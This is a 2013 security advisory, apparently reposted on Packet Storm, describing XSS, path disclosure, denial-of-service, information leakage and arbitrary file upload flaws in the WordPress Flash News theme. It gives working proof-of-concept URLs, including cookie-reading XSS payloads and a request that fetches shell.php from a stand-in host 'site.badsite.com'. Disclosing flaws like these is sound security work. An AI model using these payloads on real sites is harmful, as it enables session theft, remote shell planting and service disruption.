exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Flash News XSS / DoS / Path Disclosure / Shell Upload

WordPress Flash News XSS / DoS / Path Disclosure / Shell Upload
Posted Feb 2, 2013
Authored by MustLive

The WordPress Flash News theme suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities.

tags | exploit, remote, denial of service, shell, vulnerability, xss, info disclosure
SHA-256 | 1ac281bb3a53ce04e90aed1ef3e8ae9f688dadce3a18924247fb39aa0095c0a6

WordPress Flash News XSS / DoS / Path Disclosure / Shell Upload

Change Mirror Download
Hello list!

I want to warn you about multiple vulnerabilities in Flash News theme for
WordPress. This is commercial theme for WP from WooThemes.

These are Cross-Site Scripting, Full path disclosure, Abuse of
Functionality, Denial of Service, Arbitrary File Upload and Information
Leakage vulnerabilities.

In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of
Functionality and Denial of Service vulnerabilities in TimThumb and multiple
themes for WordPress (http://websecurity.com.ua/4910/), and later also was
disclosed Arbitrary File Uploading vulnerability. After previous advisory,
I've wrote another one about multiple themes from WooThemes
(http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site
Scripting vulnerabilities (only part of their themes were affected).

If two years ago I've wrote about holes in TimThumb and multiples themes
from WooThemes (where I mentioned Flash News), then this time I wrote
directly about this particular theme. And also I've added other holes in it.

This is example for Flash News theme. In other themes from WooThemes the
situation is similar. In above-mentioned advisory I've listed 89 vulnerable
themes for WP from WooThemes.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Flash News theme for WordPress (in last
versions there were fixed only vulnerabilities in thumb.php). I've informed
developers about these vulnerabilities already in beginning of 2011 (as
about holes in TimThumb, as about holes in their native scripts in their
themes - for WordPress and other engines).

After two years since I've informed WooThemes developers, there are hundreds
thousands of sites with only Flash News theme (not mentioning all other
themes), according to Google, and all of them are still vulnerable to many
of these vulnerabilities. Mostly were fixed holes in thumb.php, but not in
other vulnerable scripts of the theme, and there are many sites which have
fixed only part of the holes in TimThumb in the theme. E.g. they fixed Code
Execution (AFU), AoF and DoS holes, but XSS and FPD holes were left.

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you
can read in my article Using of the sites for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31) (in not fixed versions of TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Besides index.php there are also potentially FPD in other php-files of this
theme.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

Script with phpinfo.

XSS (WASC-08):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where was possible to conduct
XSS via phpinfo).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close